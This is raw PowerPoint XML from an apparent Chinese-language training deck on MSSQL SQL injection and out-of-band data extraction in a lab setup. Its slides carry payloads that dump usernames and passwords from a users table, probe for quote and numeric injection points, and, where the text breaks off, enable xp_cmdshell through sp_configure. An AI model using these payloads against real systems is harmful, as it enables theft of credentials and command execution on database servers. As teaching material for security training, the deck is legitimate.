              </a:rPr>
              <a:t>select quotename(count(*)) from users)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>--</a:t>
            </a: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79988" indent="-307192" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>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根据列名，爆出所有关键用户</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Helvetica"/>
              </a:rPr>
              <a:t>字段的数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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获得用户名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> /less-1.asp?id=1' and 1=(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> from users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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id =</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Helvetica"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>--</a:t>
            </a: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获取密码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>/less-1.asp?id=1' and 1=(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> from users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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id =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>--</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC4814C4-9BC2-CA47-9BC3-33723BB28573}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="21278" t="12534" r="2806" b="27699"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6129754" y="5514343"/>
            <a:ext cx="5721684" cy="991725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA216858-C685-244D-9878-41E7FA3C4536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="20211" t="14777" r="2719" b="14321"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="748632" y="5572488"/>
            <a:ext cx="5172576" cy="875435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2345495-4382-604F-93F1-B6E6E447D1EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="4504" t="14205" r="3364" b="14554"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1015165" y="2359884"/>
            <a:ext cx="10161671" cy="1441560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220818061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400" dirty="0"/>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据外带实验</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487E1F69-2B83-5349-BE73-54F0A131B221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549109" y="1020850"/>
            <a:ext cx="11232815" cy="4570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spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="477588" indent="-304792" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>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注入测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Payload</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 altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>http://172.16.12.2/info.aspx?id=3%27</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Payload</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US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>http://172.16.12.2/info.aspx?id=3%27--</a:t>
            </a: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注释符号不能闭合语句即不是单引号闭合</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60433220-47FA-4477-B650-E3E9E16D69F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="24477" y="3736882"/>
            <a:ext cx="6071523" cy="2043583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5E46733-0E82-48AA-BA66-1D1F5B1084E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6198485" y="3736882"/>
            <a:ext cx="5993515" cy="2043583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27137211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400" dirty="0"/>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据外带实验</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487E1F69-2B83-5349-BE73-54F0A131B221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549109" y="1020850"/>
            <a:ext cx="11232815" cy="457047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spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="477588" indent="-304792" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>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注入测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Payload</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 altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>http://172.16.12.2/info.aspx?id=3%22</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Payload</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US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>http://172.16.12.2/info.aspx?id=3%22--</a:t>
            </a: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注释符号不能闭合语句即也不是双引号闭合</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80375B8C-9D25-4E21-8E4E-3458086B01AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="42938" y="3765321"/>
            <a:ext cx="12106124" cy="1855001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33580316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400" dirty="0"/>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据外带实验</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487E1F69-2B83-5349-BE73-54F0A131B221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549109" y="1020849"/>
            <a:ext cx="11232815" cy="41626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spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="477588" indent="-304792" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>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注入测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Payload</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 altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>http://172.16.12.2/info.aspx?id=3-1</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Payload</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US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>http://172.16.12.2/info.aspx?id=2</a:t>
            </a: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注入点为数字型</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FC75EF1-B94F-470E-9914-4C8B6C196146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3284714"/>
            <a:ext cx="12192000" cy="3055063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383379888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400" dirty="0"/>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据外带实验</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487E1F69-2B83-5349-BE73-54F0A131B221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549109" y="1020850"/>
            <a:ext cx="11232815" cy="41242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spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="477588" indent="-304792" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>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注入测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Payload</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 altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>http://172.16.12.2/info.aspx?id=3;EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>sp_configure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> 'show advanced options', 1;RECONFIGURE;EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>sp_configure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
